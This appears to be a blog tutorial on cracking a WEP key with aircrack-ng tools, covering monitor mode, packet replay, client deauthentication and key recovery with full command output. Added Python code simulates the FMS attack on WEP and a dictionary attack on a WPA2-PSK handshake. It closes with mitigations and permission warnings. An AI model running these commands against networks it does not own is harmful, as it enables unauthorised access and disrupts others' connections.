Please only test these techniques on your OWN equipment, or where you have express permission. Remember: you are the heir of your karma; whatever karma you do, whether for good or for evil, you will be the heir.
That said, let's examine how easy it is to crack the WEP key of a wireless network using BackTrack 4, and then look at how this threat can be mitigated.
Start the wifi card in monitor mode (airmon-ng creates the mon0 interface used in the rest of the commands):
airmon-ng start wlan0
In another window, identify the target network with airodump-ng (hopping across all channels, writing the capture to files prefixed homewep):
airodump-ng -w homewep mon0
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:90:D0:2A:0C:7F  -34      113       21    0   7  54e  WEP  WEP    OPN  SlowNet
 00:24:17:AB:F3:53  -46        0        0    0   1  54   WPA2 CCMP   PSK  virgin broadband

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:90:D0:2A:0C:7F  00:22:3F:E9:89:FF    0    0 - 1     0       24  SlowNet
 00:90:D0:2A:0C:7F  00:25:57:8B:5D:68   -1    1e- 0     0        1
 00:90:D0:2A:0C:7F  00:22:FB:18:8B:02   -1   54e- 0     0        5
Then restart airodump-ng locked to the target's channel and BSSID to narrow in on our network (-a hides unassociated clients; -w writes the capture that aircrack-ng will read later):
airodump-ng -a --bssid 00:90:D0:2A:0C:7F --channel 7 -w homewep mon0
 CH  7 ][ Elapsed: 4 s ][ 2010-07-16 20:47

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:90:D0:2A:0C:7F  -38 100       36      124   49   7  54e  WEP  WEP         SlowNet

 BSSID              STATION            PWR   Rate      Lost  Packets  Probes
 00:90:D0:2A:0C:7F  00:22:FB:18:8B:02   -4   54e-48e    778      123
Leave that running and, in another window, use aireplay-ng's interactive replay (-2) to hunt for a data frame worth replaying: a broadcast (-d ff:ff:ff:ff:ff:ff) frame heading to the AP (-t 1). The AP re-encrypts and re-broadcasts every replayed copy under a fresh IV, which is how replaying one packet generates the initialization vectors (IVs) that aircrack-ng needs:
aireplay-ng -2 -b 00:90:D0:2A:0C:7F -d ff:ff:ff:ff:ff:ff -t 1 mon0
Leave that running too and, in yet another window, deauthenticate the victim client (-0 4 sends four bursts of deauth frames) so that it reconnects and generates some traffic, which gives aireplay-ng a packet to pick:
aireplay-ng -0 4 -a 00:90:D0:2A:0C:7F -c 00:22:FB:18:8B:02 mon0
20:49:28 Waiting for beacon frame (BSSID: 00:90:D0:2A:0C:7F) on channel 7
20:49:28 Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [98|130 ACKs]
20:49:29 Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [ 1|127 ACKs]
20:49:30 Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [ 0|127 ACKs]
20:49:30 Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [ 0|126 ACKs]
Now the aireplay-ng window finds a candidate packet...
Read 460 packets...
Size: 120, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:90:D0:2A:0C:7F
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:22:FB:18:8B:02
0x0000: 8841 2c00 0090 d02a 0c7f 0022 fb18 8b02 .A,....*.."....
0x0010: ffff ffff ffff 9047 0000 a232 d600 30c5 .......G...2..0.
0x0020: c043 e98c 208d ac1f d640 9ba6 9666 650b .C.. ....@...fe.
0x0030: 5117 3b19 f2f8 fe54 0470 9441 a2ea f702 Q.;....T.p.A....
0x0040: e188 c597 cd64 2228 37ce 3117 63fb e44c .....d"(7.1.c..L
0x0050: ed99 fe9a d67e 41e8 77f6 850c 4572 7519 .....~A.w...Eru.
0x0060: ba40 928b 1d47 7a6c 061c 160f a0ab c4cb .@...Gzl........
0x0070: c43c e739 064d 2f60 .<.9.M/`
Use this packet ? y
Saving chosen packet in replay_src-0716-204141.cap
You should also start airodump-ng to capture replies.
...and the #Data count climbs in the airodump-ng window. So, in yet another window, start aircrack-ng on the capture (-z selects the PTW attack, -n 64 tells it to look for a 64-bit key; note that airodump-ng numbers its output files rather than overwriting them, so check which homewep-NN.cap holds the locked-channel capture):
aircrack-ng -z -n 64 homewep-01.cap
and before we know it, we have the key to the network:
Aircrack-ng 1.1 r1738

[00:01:34] Tested 564707 keys (got 20026 IVs)

 KB    depth   byte(vote)
  0    5/ 25   AA(24832) 08(24576) 3C(24576) 2A(24320) 41(24320) 87(24320) 89(24064) DE(24064) A8(23808)
  1    1/ 14   BB(27136) B5(26368) C8(25856) FF(25088) 46(25088) B7(24320) EB(24064) 1A(24064) BC(23808)
  2    0/  7   CC(28928) 3F(27648) 45(26112) BA(25344) C2(25344) 03(25088) 0A(25088) 5F(24832) 8B(24320)
  3    1/ 32   DD(26368) FB(25856) 4D(25856) 69(25856) 5C(25344) 9C(25344) 36(25088) 5B(24832) 38(24576)
  4    5/  8   C6(24064) 57(23808) FC(23808) 85(23552) 9F(23552) D4(23552) E5(23552) F3(23552) 11(23296)

KEY FOUND! [ AA:BB:CC:DD:EE ]
Decrypted correctly: 100%
End to end, that probably took around 10 minutes.
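As an added example (not code from the post, nor from the aircrack-ng project), here is a small Python simulation of where the KB / depth / byte(vote) table above comes from. WEP runs RC4 with the key IV || secret key, and every data payload starts with the known LLC/SNAP byte 0xAA, so each captured packet leaks the first keystream byte for a public IV. The script plays a WEP access point (constructed data: the 40-bit key AA:BB:CC:DD:EE from the post, fed the classic Fluhrer-Mantin-Shamir weak IVs (B+3, 0xFF, X) that real traffic only hits by chance), then runs the FMS vote: each weak IV that satisfies the "resolved" condition casts a vote for one key byte, correct roughly 5% of the time and noise otherwise, and a depth-first search over the top candidates per byte (aircrack-ng's "depth") verifies each full candidate key against the known plaintext. aircrack-ng's -z option uses the newer PTW attack, which needs far fewer IVs, but it prints the same kind of table and exploits the same design flaw.

```python
"""Added example (not from the original post): a simulated WEP AP plus the classic FMS
key-recovery attack, to show where aircrack-ng's KB/depth/byte(vote) table comes from.
Constructed data: the 40-bit key the post recovered, fed the FMS weak-IV class."""
from collections import Counter

SNAP_FIRST_BYTE = 0xAA   # every WEP data payload starts with the LLC/SNAP header: known plaintext


def ksa(key):
    """RC4 key scheduling. WEP keys RC4 with IV || secret key, so the first 3 key bytes are public."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n bytes of RC4 output (PRGA) for the given key."""
    S = ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_first_ciphertext_byte(secret_key, iv):
    """What the (simulated) AP puts on the air for this IV: SNAP byte XOR first keystream byte."""
    return rc4_keystream(iv + secret_key, 1)[0] ^ SNAP_FIRST_BYTE


def constructed_capture(secret_key):
    """Constructed capture: for secret-key byte B, all 256 FMS weak IVs (B+3, 0xFF, X).
    Real traffic hits these IVs at random, which is why the attack needs so many packets."""
    capture = []
    for b in range(len(secret_key)):
        for x in range(256):
            iv = bytes([b + 3, 0xFF, x])
            capture.append((iv, wep_first_ciphertext_byte(secret_key, iv)))
    return capture


def fms_votes(capture, known_prefix):
    """Vote table for secret-key byte B = len(known_prefix): aircrack's byte(vote) column for KB B."""
    b = len(known_prefix)
    votes = Counter()
    for iv, c1 in capture:
        k = iv + known_prefix                 # the first B+3 RC4 key bytes are known to the attacker
        S = list(range(256))
        j = 0
        for i in range(b + 3):                # run the KSA only as far as the known bytes reach
            j = (j + S[i] + k[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        if S[1] < b + 3 and (S[1] + S[S[1]]) & 0xFF == b + 3:   # FMS "resolved" condition
            z = c1 ^ SNAP_FIRST_BYTE          # first keystream byte, recovered via the known plaintext
            votes[(S.index(z) - j - S[b + 3]) & 0xFF] += 1       # right ~5% of the time, noise otherwise
    return votes


def crack_wep(capture, key_len, known=b"", fudge=8):
    """Depth-first search over the top `fudge` candidates per byte (aircrack's 'depth'),
    verifying each full candidate key against the known plaintext of captured packets."""
    if len(known) == key_len:
        ok = all(wep_first_ciphertext_byte(known, iv) == c1 for iv, c1 in capture[:8])
        return known if ok else None
    for cand, _ in fms_votes(capture, known).most_common(fudge):
        found = crack_wep(capture, key_len, known + bytes([cand]), fudge)
        if found is not None:
            return found
    return None


SECRET_KEY = bytes.fromhex("aabbccddee")   # constructed target: the 40-bit key the post recovered
CAPTURE = constructed_capture(SECRET_KEY)

if __name__ == "__main__":
    top = fms_votes(CAPTURE, b"").most_common(5)
    print("KB 0 byte(vote):", " ".join(f"{k:02X}({v})" for k, v in top))
    print("KEY FOUND! [", ":".join(f"{k:02X}" for k in crack_wep(CAPTURE, 5)), "]")
```

The fix on the WEP side was never possible: the IV is only 24 bits, it is sent in the clear, and it is prepended to the key, so the statistics work no matter how "random" the secret key is. That is why the mitigation below starts with "don't use WEP" rather than "use a better WEP key".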
More info and other techniques are available at:
http://www.aircrack-ng.org/
To eliminate this threat:
- Don't use WEP; use WPA2.
- If you use WPA/WPA2 with a pre-shared key (PSK), choose a long random passphrase. The attacker only needs to sniff the four-way handshake (a deauth like the one above forces a client to reconnect and perform it) and can then brute-force the passphrase offline against the handshake's MIC; a short or dictionary passphrase falls about as quickly as WEP did.
- For more secure environments, use WPA2 with 802.1X certificate-based authentication (WPA2-Enterprise, e.g. EAP-TLS) instead of a PSK.
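Why the PSK's length matters, as an added example in Python (not code from the post): the script builds the fields an attacker reads from messages 1 and 2 of the WPA2 four-way handshake (constructed data: the AP and client MACs from the post's airodump-ng output, made-up nonces, an EAPOL-Key message 2 with its MIC field zeroed, and a five-word wordlist that contains the real passphrase) and runs the offline attack. The derivation is the standard one from IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds); PTK = PRF-512(PMK, "Pairwise key expansion", MACs and nonces); MIC = HMAC-SHA1(KCK, EAPOL frame) truncated to 16 bytes for WPA2/CCMP (WPA/TKIP uses HMAC-MD5). Nothing on the air depends on the passphrase except through PBKDF2, so each guess costs 4096 SHA-1 rounds and nothing else rate-limits the search.

```python
"""Added example (not from the original post): offline dictionary attack on a captured
WPA2-PSK four-way handshake, showing why a short PSK is no better than WEP."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i PSK mapping: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 256-bit key."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b""
    for i in range(4):                          # 4 x 160 bits >= 512 bits
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]                             # KCK = ptk[0:16], KEK = ptk[16:32], TK = ptk[32:48]


def eapol_mic(kck, eapol_frame):
    """Key MIC for WPA2 (AKM 00-0F-AC:2): HMAC-SHA1 over the EAPOL-Key frame with the MIC field
    zeroed, truncated to 128 bits. WPA/TKIP (AKM 00-50-F2:2) uses HMAC-MD5 instead."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, hs):
    """The offline attack: one PBKDF2 per guess, compared with the MIC sniffed in message 2."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return guess
    return None


# --- constructed capture: what a WPA2 client (re)association would have left in the .cap ---
AA = bytes.fromhex("0090D02A0C7F")              # authenticator (AP) MAC, from the post's airodump output
SPA = bytes.fromhex("0022FB188B02")             # supplicant (client) MAC, likewise
ANONCE = bytes(range(32))                       # made-up nonces; real ones are random per handshake
SNONCE = bytes(range(255, 223, -1))
# EAPOL-Key message 2 (802.1X header + RSN key descriptor), MIC field zeroed as the MIC computation requires
EAPOL_M2 = (bytes.fromhex("01030075" "02" "010a" "0000" "0000000000000001")   # hdr, desc type, key info, key len, replay ctr
            + SNONCE + bytes(16) + bytes(8) + bytes(8) + bytes(16)               # nonce, key IV, RSC, reserved, MIC (zeroed)
            + bytes.fromhex("0016" "30140100000fac040100000fac040100000fac020000"))  # key data: RSN IE (CCMP, PSK)


def constructed_handshake(real_passphrase, ssid="SlowNet"):
    """Play the victim side: the MIC a client that knows real_passphrase puts into message 2."""
    kck = ptk_from_pmk(pmk_from_passphrase(real_passphrase, ssid), AA, SPA, ANONCE, SNONCE)[:16]
    return {"ssid": ssid, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": EAPOL_M2, "mic": eapol_mic(kck, EAPOL_M2)}


WORDLIST = ["password", "12345678", "slownet1", "letmein1", "Tr0ub4dor&3"]   # constructed wordlist
HANDSHAKE = constructed_handshake("letmein1")                                  # weak PSK: it is in the list

if __name__ == "__main__":
    print("PSK found:", crack_psk(WORDLIST, HANDSHAKE))
```

The 4096 PBKDF2 rounds are the only thing slowing the attacker down, and a single modern GPU still gets through on the order of a million passphrases per second, so the wordlist is the whole game: a passphrase that is long and random enough not to be in one is the only defence for a PSK network, and 802.1X removes the shared secret altogether.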
Also, remember what I said at the start: only try this on your OWN equipment or where you have PERMISSION. Karma is a real thing, and so is jail ;o)
Hi thanks for posting this